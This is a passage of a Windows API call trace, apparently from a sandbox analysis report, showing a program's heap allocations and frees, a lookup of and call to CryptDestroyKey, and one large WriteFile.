dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c458b8 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0262.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3d448e0 | out: hHeap=0x970000) returned 1 [0262.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0262.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0262.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0262.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0262.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0262.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0262.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0262.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0262.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0262.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0262.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0262.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0262.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0262.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0262.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0262.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0262.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0262.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0262.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0262.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf08b0 | out: hHeap=0x970000) returned 1 [0262.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0262.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0262.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x55008) returned 0x3d44008 [0262.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50048 | out: hHeap=0x970000) returned 1 [0262.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0262.471] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0262.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0262.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0262.471] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0262.471] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0262.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0262.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0262.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0262.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0262.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0262.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0262.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x55008) returned 0xe50048 [0262.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0262.478] WriteFile (in: hFile=0x2a0, lpBuffer=0xe50048*, nNumberOfBytesToWrite=0x55008, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0xe50048*, lpNumberOfBytesWritten=0x8cf5e4*=0x55008, lpOverlapped=0x0) returned 1 [0262.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0262.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50048 | out: hHeap=0x970000) returned 1 [0262.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0262.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0262.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0262.486] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0262.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0262.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0262.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0262.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0262.486] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0262.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0262.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0262.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0262.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0262.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0262.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0262.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515c8 [0262.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0262.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0262.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0262.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0262.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0262.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0262.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0262.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0262.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0262.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0262.486] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0262.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0262.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55098 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0262.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518e0 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0262.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0262.487] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0262.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0262.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0262.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0262.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0262.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0262.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0262.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0262.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0262.488] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0262.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0262.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0262.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51958 [0262.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0262.488] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0262.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0262.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0262.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0262.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0262.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0262.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0262.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0262.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0262.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0262.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0262.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0262.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0262.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0262.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0262.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0262.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0262.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0262.489] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0262.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0262.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0262.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0262.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0262.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0262.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0262.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0262.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0262.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0262.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0262.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0262.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0262.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0262.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51b08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0262.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0262.490] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0262.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0262.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0262.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0262.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0262.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0262.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0262.490] CryptDestroyKey (hKey=0xa875d0) returned 1 [0262.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0262.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0262.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0262.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0262.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0262.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0262.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0262.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0262.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0262.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0262.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0262.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0262.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0262.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0262.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0262.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0262.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0262.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0262.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0262.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0262.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0262.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0262.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0262.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0262.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0262.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0262.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0262.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0262.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0262.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0262.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0262.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0262.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0262.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0262.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0262.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0262.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0262.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0262.492] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0262.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0262.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0262.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0262.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 